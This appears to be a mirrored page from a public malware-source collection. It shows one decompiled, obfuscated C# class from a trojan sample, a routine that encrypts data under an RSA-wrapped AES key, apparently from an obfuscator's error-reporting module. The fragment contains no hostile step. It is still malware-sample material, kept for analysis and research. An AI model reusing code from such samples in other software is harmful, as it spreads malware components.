mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
f2ac1ece55
add
80 lines
3.2 KiB
C#
80 lines
3.2 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: syncuiLoader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: F112AE9C-7564-463C-8834-3BB2BC4FBE1B
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.aamy-d1153c91831872cfeacf510426d9b4752eab5933102816559dcd2628b12a7253.exe
|
||
|
||
using \u0003;
|
||
using System;
|
||
using System.IO;
|
||
using System.Runtime.InteropServices;
|
||
using System.Security.Cryptography;
|
||
|
||
namespace \u0003
|
||
{
|
||
internal sealed class \u0002
|
||
{
|
||
public static string \u0001;
|
||
|
||
public static byte[] \u0003([In] byte[] obj0, [In] string obj1)
|
||
{
|
||
if (obj1.StartsWith("{"))
|
||
{
|
||
\u0002.\u0001 = "ERR 2006: This template was not properly processed by {smartassembly}";
|
||
return (byte[]) null;
|
||
}
|
||
try
|
||
{
|
||
RijndaelManaged rijndaelManaged = new RijndaelManaged();
|
||
RSACryptoServiceProvider cryptoServiceProvider = new RSACryptoServiceProvider();
|
||
cryptoServiceProvider.FromXmlString(obj1);
|
||
rijndaelManaged.GenerateKey();
|
||
rijndaelManaged.GenerateIV();
|
||
byte[] numArray1 = new byte[48];
|
||
Buffer.BlockCopy((Array) rijndaelManaged.Key, 0, (Array) numArray1, 0, 32);
|
||
Buffer.BlockCopy((Array) rijndaelManaged.IV, 0, (Array) numArray1, 32, 16);
|
||
MemoryStream memoryStream = new MemoryStream();
|
||
try
|
||
{
|
||
byte[] buffer = cryptoServiceProvider.Encrypt(numArray1, false);
|
||
memoryStream.WriteByte((byte) 1);
|
||
memoryStream.WriteByte(Convert.ToByte(buffer.Length / 8));
|
||
memoryStream.Write(buffer, 0, buffer.Length);
|
||
}
|
||
catch (CryptographicException ex1)
|
||
{
|
||
try
|
||
{
|
||
byte[] numArray2 = new byte[16];
|
||
byte[] numArray3 = new byte[16];
|
||
Buffer.BlockCopy((Array) rijndaelManaged.Key, 0, (Array) numArray2, 0, 16);
|
||
Buffer.BlockCopy((Array) rijndaelManaged.Key, 16, (Array) numArray3, 0, 16);
|
||
byte[] buffer1 = cryptoServiceProvider.Encrypt(numArray2, false);
|
||
byte[] buffer2 = cryptoServiceProvider.Encrypt(numArray3, false);
|
||
byte[] buffer3 = cryptoServiceProvider.Encrypt(rijndaelManaged.IV, false);
|
||
memoryStream.WriteByte((byte) 2);
|
||
memoryStream.WriteByte(Convert.ToByte(buffer1.Length / 8));
|
||
memoryStream.Write(buffer1, 0, buffer1.Length);
|
||
memoryStream.Write(buffer2, 0, buffer2.Length);
|
||
memoryStream.Write(buffer3, 0, buffer3.Length);
|
||
}
|
||
catch (CryptographicException ex2)
|
||
{
|
||
\u0002.\u0001 = "ERR 2005: The 128-bit encryption is not available on this computer. You need to install the High Encryption Pack in order to use the reporting feature.";
|
||
return (byte[]) null;
|
||
}
|
||
}
|
||
CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write);
|
||
cryptoStream.Write(obj0, 0, obj0.Length);
|
||
cryptoStream.FlushFinalBlock();
|
||
return memoryStream.ToArray();
|
||
}
|
||
catch (Exception ex)
|
||
{
|
||
\u0002.\u0001 = "ERR 2004: " + ex.Message;
|
||
return (byte[]) null;
|
||
}
|
||
}
|
||
}
|
||
}
|